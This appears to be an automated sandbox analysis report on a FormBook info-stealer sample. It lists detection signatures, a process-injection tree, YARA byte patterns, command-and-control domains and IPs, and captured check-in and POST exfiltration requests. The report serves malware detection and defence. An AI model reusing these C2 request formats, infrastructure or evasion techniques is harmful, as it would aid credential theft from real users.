Windows Analysis Report
NjjLYnPSZr.exe

Overview

General Information

Sample name: NjjLYnPSZr.exe (renamed because original name is a hash value)
Original sample name: 2fc1d7f69545d2931aa3f9ce5f9cb5e038027f20200e9b416befea7465413f32.exe
Analysis ID: 1530786
MD5: 8a6aa375bc5ca6ea45711462189103cb
SHA1: dfd00591e07f55a69cb29ffdba5af54bd1a4e3ea
SHA256: 2fc1d7f69545d2931aa3f9ce5f9cb5e038027f20200e9b416befea7465413f32
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • NjjLYnPSZr.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\NjjLYnPSZr.exe" MD5: 8A6AA375BC5CA6EA45711462189103CB)
    • XFLTednCZUTqje.exe (PID: 6040 cmdline: "C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • compact.exe (PID: 7836 cmdline: "C:\Windows\SysWOW64\compact.exe" MD5: 5CB107F69062D6D387F4F7A14737220E)
        • XFLTednCZUTqje.exe (PID: 5856 cmdline: "C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 8012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found

Source | Rule | Description | Author | Strings
00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x54494:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x3c603:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.NjjLYnPSZr.exe.df0000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.NjjLYnPSZr.exe.df0000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e393:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

No Sigma rule has matched

          AV Detection

          Source: NjjLYnPSZr.exe, Avira: detected
          Source: NjjLYnPSZr.exe, ReversingLabs: Detection: 60%
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
          Source: NjjLYnPSZr.exe, Joe Sandbox ML: detected
          Source: NjjLYnPSZr.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: NjjLYnPSZr.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: compact.pdbGCTL source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.000000000091D000.00000004.00000020.00020000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000002.3604055024.0000000001108000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XFLTednCZUTqje.exe, 00000002.00000000.1894942549.0000000000B6E000.00000002.00000001.01000000.00000005.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3603415797.0000000000B6E000.00000002.00000001.01000000.00000005.sdmp
          Source: Binary string: wntdll.pdbUGP source: NjjLYnPSZr.exe, 00000000.00000002.1971204229.000000000118E000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1879483342.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1881085129.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1972841113.0000000003633000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1971132275.0000000003487000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.000000000397E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: NjjLYnPSZr.exe, NjjLYnPSZr.exe, 00000000.00000002.1971204229.000000000118E000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1879483342.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, NjjLYnPSZr.exe, 00000000.00000003.1881085129.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, compact.exe, compact.exe, 00000005.00000002.3604665421.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1972841113.0000000003633000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000003.1971132275.0000000003487000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000005.00000002.3604665421.000000000397E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: compact.pdb source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.000000000091D000.00000004.00000020.00020000.00000000.sdmp, XFLTednCZUTqje.exe, 00000002.00000002.3604055024.0000000001108000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\compact.exe, Code function: 5_2_030FC340 FindFirstFileW, FindNextFileW, FindClose (5_2_030FC340)
          Source: C:\Windows\SysWOW64\compact.exe, Code function: 4x nop then xor eax, eax (5_2_030E9B10)

          Networking

          Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 34.120.137.41:80
          Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 3.33.130.190:80
          Source: DNS query: www.beescy.xyz
          Source: Joe Sandbox View, IP Address: 162.0.213.72
          Source: Joe Sandbox View, IP Address: 84.32.84.32
          Source: Joe Sandbox View, ASN Name: O2SWITCHFR
          Source: Joe Sandbox View, ASN Name: ACPCA
          Source: Joe Sandbox View, ASN Name: CNSERVERSUS
          Source: Joe Sandbox View, ASN Name: FTG-AS-APForewinTelecomGroupLimitedISPatHK
          Source: unknown, TCP traffic detected without corresponding DNS query: 118.99.50.8
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /dcai/?Sh=JzKwzxEjjJDs1ynMHer+TNevqF7oFKk+RBNCM6w6NpGOWZMZrcBh0esk0Vp2cdNARH8NLeIYDalhXOdQ0Ma7tvgTEF7hsrDYV+tcKJvJSVI5izhoL98hwXM=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.sacidasorte.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /o1rp/?Sh=TBsR9lfn+qQhrzhd4VN7whgaax1SSLbEYlfYc+CfPbvAogjyvhThgxnzNfioE4F1AGXhUEA9gsdduAUKMlkxrWhulp0A29FjViMz3Iaz4UFzPouUBmhdpGY=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.yosoyemy.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /uqfz/?Sh=mcURcygGZpi8BUAEri2LzCX8yukoHIUSB9ATV0AA66/eXSD2DbYq2fDOBcTf2y0GiA7pk1o8xA7eBrRh6Cv9Vx9YWZ7NmBQtUSw3jvSSlGdRHD15Z6r2w2o=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.go2super.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /3nzp/?Sh=PglkqFvbbyb87SegldF7644R50nw13706su3sEKMhHJ419d8UFlSgmN6uEUbiABfJzkrsK6wePLWTRJFKAJP15xlx/rUOqsRMQGimgyXa3wd/uL7sq2sISc=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.corverd.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /x35b/?Sh=fVDKJz+SStMVbfQUmkYKwfd/Kz5vW54YQ3dZU+tucUYAFBvCN7d4q6mFay3q8TR2KAYtpV66b4jE73PrL/8YW0e6Mz+digafyc3ZonBVmSzoReAw1BtBLHs=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.66hc7.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /m4qv/?Sh=P2TusARkbEgcEs+mDyMHtP9emvoSKlJZWWEgC4tjmOg8nAhT+FFe9yeelcBnkIXwjfDCMJlqRnnZfo12xo8UG7kWIL0+yfipd64llhGw+b1VwhgkmL0TKqs=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.beescy.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /7ug6/?f6SpQ=_n84nZ4HGta&Sh=IXJECadondWQh91fX6gMxPrxehpEbK/sXgmpgogo4Iy+9wWP8KKNSUdB/sGHFOlG3Y0hTlB2s4BH9YC5SvgzHxgsSlTs6mELWZRATho00JDOVx4L12qgKBs= HTTP/1.1Host: www.personalcaresale.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /wzoz/?Sh=Ppcgdv6DrtqpILZ3xPy0g9msApc+gUIN/EMWlKKGCKnUGKGSiYq02Q3K9hPbzriSr907/cLUuPH0KiO46gsbjuqN2MfoymjOpxTW14iCTowXcyBnLNm1v4w=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.ainude2.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /99um/?f6SpQ=_n84nZ4HGta&Sh=sejrBqbnhxLzIpZobXocfoJh7+Ax68vpI3pksmQcQlCqcURGXTbbLy2S/SU0nQLTr9eIuSCZyPnks+fy4cbgfRvRA7W8zuFue70e+ik0nvs8B1GRgQpORnQ= HTTP/1.1Host: www.yourtech-agency.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /qyz6/?Sh=cO/WbHS7dDlPjWOw24pePOdtBvzI7qrstwS5E88tqn3GEGw6O6zMXAiSEd+QRtw+ArL2+ZdGEPoP/wr/W49OxjdcbcDVqf77kjZAc/w1Hn9qnxIMaTPUER4=&f6SpQ=_n84nZ4HGta HTTP/1.1Host: www.mybodyradar.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficHTTP traffic detected: GET /uj7x/?f6SpQ=_n84nZ4HGta&Sh=8o7PCltX/VPHe/nsrm2GraoW3Ln6cTBZ+TiwGxPZp0XU3O8CthtWROn8w6ZbnbkTCMdEyZnAfiGuFPjlC9agdmB/YOAJ3uSjrm6gafSyJ19b8vSngBVuvZk= HTTP/1.1Host: www.zt555.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
          Source: global trafficDNS traffic detected: DNS query: www.sacidasorte.com
          Source: global trafficDNS traffic detected: DNS query: www.yosoyemy.com
          Source: global trafficDNS traffic detected: DNS query: www.go2super.app
          Source: global trafficDNS traffic detected: DNS query: www.corverd.store
          Source: global trafficDNS traffic detected: DNS query: www.66hc7.com
          Source: global trafficDNS traffic detected: DNS query: www.beescy.xyz
          Source: global trafficDNS traffic detected: DNS query: www.personalcaresale.shop
          Source: global trafficDNS traffic detected: DNS query: www.ainude2.cloud
          Source: global trafficDNS traffic detected: DNS query: www.yourtech-agency.com
          Source: global trafficDNS traffic detected: DNS query: www.mybodyradar.net
          Source: global trafficDNS traffic detected: DNS query: www.zt555.shop
          Source: global trafficDNS traffic detected: DNS query: www.tigun.top
          Source: unknownHTTP traffic detected: POST /o1rp/ HTTP/1.1Host: www.yosoyemy.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.yosoyemy.comCache-Control: max-age=0Content-Length: 199Content-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.yosoyemy.com/o1rp/User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42Data Raw: 53 68 3d 65 44 45 78 2b 53 6a 57 2f 35 38 61 6a 32 31 61 68 31 59 68 2f 31 73 2f 41 67 67 46 5a 71 48 51 64 6c 6e 36 41 2b 4b 43 5a 6f 37 79 70 32 76 74 6b 6a 4c 38 74 69 50 50 53 2b 53 47 51 4b 70 70 51 68 6d 7a 51 6c 6f 2f 6c 4e 52 51 35 7a 4e 77 41 6d 74 49 6d 47 4e 63 6c 36 38 77 2b 5a 73 37 66 77 38 42 36 5a 72 54 2f 32 49 31 5a 4c 65 75 44 30 52 79 6a 41 67 71 7a 6e 6d 7a 6b 4c 44 7a 49 49 51 42 43 51 70 69 6f 41 34 57 46 6d 35 4d 4e 57 49 2b 79 37 4a 42 37 6b 34 33 44 6f 37 47 69 4f 61 57 42 76 46 43 6c 6e 48 4b 56 62 77 51 38 31 56 32 2f 4f 73 75 6c 73 63 71 41 68 38 54 6e 51 3d 3d Data Ascii: Sh=eDEx+SjW/58aj21ah1Yh/1s/AggFZqHQdln6A+KCZo7yp2vtkjL8tiPPS+SGQKppQhmzQlo/lNRQ5zNwAmtImGNcl68w+Zs7fw8B6ZrT/2I1ZLeuD0RyjAgqznmzkLDzIIQBCQpioA4WFm5MNWI+y7JB7k43Do7GiOaWBvFClnHKVbwQ81V2/OsulscqAh8TnQ==
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:46:49 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:46:52 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:46:54 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:46:57 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nzp/ was not found on this server.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:47:17 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 16026 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:47:19 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 16026 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:47:22 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 16026 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:47:24 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 16026 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html; charset=utf-8
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:47:30 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | X-Powered-By: PHP/7.4.33 | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrkouYgbFSvjyNm4ghpwvDtClIQMVGiqnIP4Ibf3zogZf0fJFZ6Ld8ghu4yZ4HZMDw7An2%2BeK7Lal2ZIyGQCHGbj%2BFN2QZZTeYrZTgE4SYTlc8MLLHkxc4dDV6wYHd%2FnIoQgJn%2B7fvYmdjhe"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8d06b827aa7242c0-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 190
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:47:33 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | X-Powered-By: PHP/7.4.33 | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tzRCHBFuAmixsbqmUDwArSs9qCY9i27FUN5LkJCPXcbvdLi6uMcMxY465hNXOHzZ3IE33BZ0IGk%2Bo2DutnibkEMi9AH7CBnlMGEzjIycRy%2ByGlg3Idlxk81jluvlAmfGpLrhf%2FiIhZBLYlXm"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8d06b8376dc98c87-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 190
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:47:35 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | X-Powered-By: PHP/7.4.33 | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7qZmIIrcoC1kQovUaKDpvVpJ80SSS%2BCaKD%2FPzBTnCYwOzSTKNBPcSRoH0rxxllNFJiWNu6aAhg6hUW8QvzY1Rz5lEE1NfCqYSgd0FEmRaAXwK3Ag%2B%2BrJIe%2BdAM3A8XN4xkvNcQmArX4iXbOw"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8d06b8478dce443e-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 190
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 10 Oct 2024 12:47:38 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | X-Powered-By: PHP/7.4.33 | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I11BaVq1cCi1YXatJQfQr7AG4OXMehuzA5%2FBg2jQUM9QF5ePyWS9KogFmbsKF7Vog4OJSf%2FNnCOVfEFE7e9ei%2BpHfYDWiThrGArL4iJ5rY%2Faul4GD87aYAVvIVZrZY%2FU2Q1zppDWQAzxpDar"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Speculation-Rules: "/cdn-cgi/speculation" | Server: cloudflare | CF-RAY: 8d06b8573cc37d18-EWR | alt-svc: h3=":443"; ma=86400 | Data Raw: 30 0d 0a 0d 0a | Data Ascii: 0
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 10 Oct 2024 12:48:25 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 10 Oct 2024 12:48:27 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 10 Oct 2024 12:48:30 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 10 Oct 2024 12:48:33 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: compact.exe, 00000005.00000002.3605554811.000000000483C000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003AFC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://goge8opp.com:301
          Source: compact.exe, 00000005.00000002.3605554811.0000000004386000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003646000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yosoyemy.com/o1rp?Sh=TBsR9lfn
          Source: XFLTednCZUTqje.exe, 00000006.00000002.3606411027.0000000005578000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.zt555.shop
          Source: XFLTednCZUTqje.exe, 00000006.00000002.3606411027.0000000005578000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.zt555.shop/uj7x/
